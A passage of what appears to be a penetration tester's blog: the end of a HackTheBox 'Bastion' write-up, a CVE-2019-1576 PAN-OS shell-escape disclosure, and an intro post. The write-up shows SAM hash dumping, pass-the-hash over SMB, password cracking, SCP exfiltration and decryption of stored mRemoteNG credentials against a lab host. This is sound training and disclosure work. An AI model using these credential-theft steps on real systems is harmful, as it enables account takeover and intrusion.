root@kali:smb# guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/disk1
root@kali:smb# cd /mnt/disk1
root@kali:disk1# ls
$Recycle.Bin autoexec.bat config.sys Documents and Settings pagefile.sys PerfLogs ProgramData Program Files Recovery System Volume Information Users Windows

Looking around the filesystem, it appears to be a very basic install of Windows with no other programs installed and the user L4mpje as a local administrator. We can extract the hashes for users from the registry using the pwdump tool. This tool uses the SECURITY and SAM hives of the registry and outputs the user information and hashes in a format that looks like /etc/shadow on Linux systems, which is what john expects.

root@kali:disk1# cd Windows/System32/config
root@kali:config# pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Using pth-smbclient, we verify that the hash extracted from the SAM database matches the hash on Bastion.

root@kali:bastion# pth-smbclient -U L4mpje%aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 //10.10.10.134/Backups
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Try "help" to get a list of possible commands.
smb: \> ls 
  .                                   D        0  Mon Aug  5 21:09:35 2019
  ..                                  D        0  Mon Aug  5 21:09:35 2019
  ASwYWuILip                          D        0  Mon Aug  5 20:51:59 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  oTWBZwpEdv                          D        0  Mon Aug  5 20:51:50 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  tmp                                 A      116  Mon Aug  5 21:09:35 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2788438 blocks available

I exported the hash information to a file and passed that to john using the rockyou.txt wordlist, and was able to recover the password for the L4mpje user.

root@kali:bastion# john hashes --show --format=nt
Administrator::500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

3 password hashes cracked, 0 left

User own

We are able to SSH into the host using the recovered L4mpje password, getting us a nice cmd.exe shell over SSH.

root@kali:bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
[screen clear]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

Looking around the system, we see there’s a couple more programs installed on this box than L4mpje-PC.

l4mpje@BASTION C:\Users\L4mpje>cd ..\..
l4mpje@BASTION C:\>cd "Program Files (x86)"
l4mpje@BASTION C:\Program Files (x86)>dir
 Volume in drive C has no label.                      
 Volume Serial Number is 0CB3-C487
 
 Directory of C:\Program Files (x86)

22-02-2019  15:01              .                       
22-02-2019  15:01              ..                       
16-07-2016  15:23              Common Files                       
23-02-2019  10:38              Internet Explorer                       
16-07-2016  15:23              Microsoft.NET                       
22-02-2019  15:01              mRemoteNG                       
23-02-2019  11:22              Windows Defender                       
23-02-2019  10:38              Windows Mail                       
23-02-2019  11:22              Windows Media Player                       
16-07-2016  15:23              Windows Multimedia Platform                       
16-07-2016  15:23              Windows NT                       
23-02-2019  11:22              Windows Photo Viewer                       
16-07-2016  15:23              Windows Portable Devices                       
16-07-2016  15:23              WindowsPowerShell                       
               0 File(s)              0 bytes                       
              14 Dir(s)  11.418.263.552 bytes free




mRemoteNG s an open source remote
connections manager, similar to RoyalTS or RDCMan.
You configure connections with credentials in mRemoteNG in order to simplify
connections to remote hosts. We can find the configuration data for mRemoteNG
under the AppData folder in the AppData directory for L4mpje.

l4mpje@BASTION C:\Program Files (x86)> cd ..\Users\L4mpje\AppData\Roaming\mRemoteNG
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019  15:03              .
22-02-2019  15:03              ..
22-02-2019  15:03             6.316 confCons.xml
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup
22-02-2019  15:03                51 extApps.xml
22-02-2019  15:03             5.217 mRemoteNG.log
22-02-2019  15:03             2.245 pnlLayout.xml
22-02-2019  15:01              Themes
              14 File(s)         76.577 bytes
               3 Dir(s)  11.417.452.544 bytes free


Administrator own

Because this is a fully functional OpenSSH server, we can exfiltrate files
using SCP just like on a Linux host.


root@kali:bastion# scp L4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml ./
L4mpje@10.10.10.134's password: 
confCons.xml                               100% 6316   110.0KB/s   00:00
root@kali:bastion# cat confCons.xml


    
    --snip--




The config file contains information about an RDP connection locally as
Administrator, including a Base64 encoded encrypted blob as the password.
A quick Internet search reveals that there is a simple Python script
available on GitHub to decrypt the password.

root@kali:bastion# python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2


Now that we have the Administrator password, we can SSH into the host with
administrative privileges.

root@kali:bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password
[screen clear]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>


Summary

This box was a pretty simple box overall but with some fun puzzles, like
figuring out how to deal with exfiltrating large files over SMB, and decrypting
the password used by mRemoteNG.
SMB is usually thought about from a pentesting perspective as a service that,
if vulnerable, can be used to easily own a box as SYSTEM. This box was a
great exercise in using SMB the way it was intended to exfiltrate information.



Cve_2019_1576
2019-07-22T00:00:00+00:00


layout: post
title:  “CVE-2019-1576: PAN-OS Command Injection/Shell Escape”
date:   2019-07-22 00:00:00 -0400
categories: posts cve
—

Earlier this year I was helping RIT’s
Collegiate Cyber Defense Competition (CCDC)
team prepare to compete at the national competition by looking into possible
attack vectors that the red team would be using to exploit the team’s
infrastructure and how to defend against those attacks.
Nick O’Brien and I decided to look into the
Palo Alto Networks virtual firewall product to find potential pain points for
the team, as PAN has been a sponsor for the competition for the last few years
and has frequently provided equipment and VMs to teams for use during the
competition. Firewalls are potent tools for defenders to use, and PAN-OS offers
additional support for identifying the protocols used by traffic passing
through it using deep packet inspection, which is excellent for identifying
malicious traffic that doesn’t wrap its C2 traffic around an existing protocol.
While trying to figure out how the PA-VM appliance operates, I discovered a
vulnerability in the CLI used to administer the firewall. This blog post will
explain a little bit about how the VM works, how the vulnerability can be
triggered, and what steps PAN used to mitigate the vulnerability.

PAN-OS overview

The PA-VM appliance is a virtualized version of the hardware firewall that PAN
offers. The operating system running on the VM, PAN-OS, is operationally
identical to the version running on the hardware appliance. The OS uses a
minimal version of CentOS 7, with restrictions that prevent the user from
accessing the underlying Linux operating system. Console or SSH sessions use
the CLI binary /usr/local/bin/pan-cli as a shell, which is how administrators
configure the firewall. Administrators are also able to configure the firewall
using a web interface. Most of the default Linux utilities, like less, more,
and vi remain on the filesystem but are mostly inaccessible from the
command-line. This is all the information needed for this post, but I hope to
eventually do a more in-depth analysis of the different components used within
the PA-VM in a future blog post since it appears that there isn’t any public
research into this space at this point.

Vulnerability overview

Some commands within the CLI directly call their underlying Linux utilities to
execute that command. For instance, the ping command uses the underlying
executable to perform pings over the management interface of the appliance. The
CLI sanitizes the input for this command and all other commands that I tested
to prevent command injection.



However, some features of the less command were overlooked. The less
utility is used to read files and ships with most versions of Linux. A command
with the same name in the PAN-OS CLI is used to read debug files or logs and
calls the /usr/bin/less binary to open the file.



Most editors or file browsers allow users to call other binaries directly from
within them by typing an ! with the command to run following it, including
less. This can allow a user to call the bash shell, escaping out of the PAN
CLI.



This vulnerability was given a 6.5 score on the CVSS 2.0 scale
due to the need to authenticate to exploit it.

Mitigation

Palo Alto Networks included a fix for this vulnerability with their 9.0.3
version update, which shipped in mid-July. Attempting to type an ! in less
returns a Command not available (press RETURN) error message, preventing
command execution.
It appears that this error message is used on several other “commands” within
less that would also result in either command execution or arbitrary reads of
the filesystem.
Looking at the relevant portion of the control flow graph for the less binary
in Binary Ninja, which is at address 0x406d60 in the patched version and
address 0x4077d9 in the vulnerable version, we can see that a new flow has
been added to the large switch statement used to respond to the various
commands that can be issued from within less. I had some trouble reversing
this portion of the code, as this is a fairly complex switch statement, but I
was able to figure out using the help text used when issuing the :h command
within less that :e, ^X^V, and :v are no longer valid commands. :e
and ^X^V allow the user to open other files within less, and :v opens the
current file in vi. vi allows users to run arbitrary commands using the !
command, similar to less.





Disclosure timeline

4/6/2019 - Initial report made to PAN via web form

4/8/2019 - Initial response from PAN asking for reproduction evidence, provided
more evidence

5/31/2019 - PAN reports fix ready, just needs to pass internal testing

6/30/2019 - Status update requested

7/11/2019 - PAN reports patch will be going out on 7/15/2019

7/15/2019 - PAN-OS 9.0.3 is released, security advisory made public


Hello
2019-07-21T00:00:00+00:00


layout: post
title:  “Hello!”
date:   2019-07-21 00:00:00 -0400
categories: posts
—

Hello! My name is Joe Graham, and welcome to my blog! I am a cybersecurity
professional who specializes in penetration testing and offensive security.
I plan to include things like HackTheBox write-ups and posts about penetration
testing or participating in bug bounties/vulnerability disclosure. Thanks for
visiting!